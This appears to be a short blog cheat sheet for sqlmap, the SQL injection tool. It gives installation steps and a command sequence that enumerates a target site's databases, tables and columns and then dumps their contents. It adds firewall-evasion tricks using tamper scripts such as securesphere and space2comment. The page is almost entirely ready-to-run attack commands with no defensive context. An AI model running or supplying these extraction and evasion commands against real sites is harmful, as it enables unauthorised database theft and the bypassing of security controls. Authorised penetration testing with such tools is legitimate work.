Sqlmap

sqlmap.org
github.com/sqlmapproject/sqlmap

Introduction

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers.

Installation

# git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

Usage

# cd sqlmap-dev
# python sqlmap.py -u "www.example.com/video?c=27" --random-agent
# python sqlmap.py -u "www.example.com/video?c=27" --random-agent --dbs
# python sqlmap.py -u "www.example.com/video?c=27" --random-agent -D database --tables
# python sqlmap.py -u "www.example.com/video?c=27" --random-agent -D database -T table --columns
# python sqlmap.py -u "www.example.com/video?c=27" --random-agent -D database -T table -C column --dump

Misc

Bypass firewalls in sqlmap:
eg:1
To bypass securesphere firewall, use following

# python sqlmap.py -u "www.example.com/video?c=27" --random-agent --tamper securesphere

To use bypass multiple firewall rule, use as following:

# python sqlmap.py -u "www.example.com/video?c=27" --random-agent --tamper=securesphere, space2comment

Find other which you can try inside “tamper” dir inside sqlmap-dev

Useful Links

hackersforcharity.org/ghdb
http://www.moonsec.com/post-422.htmlpdf here
http://www.forkbombers.com/2016/07/sqlmap-tamper-scripts-update.htmlpdf here

Leave a Reply

Your email address will not be published. Required fields are marked *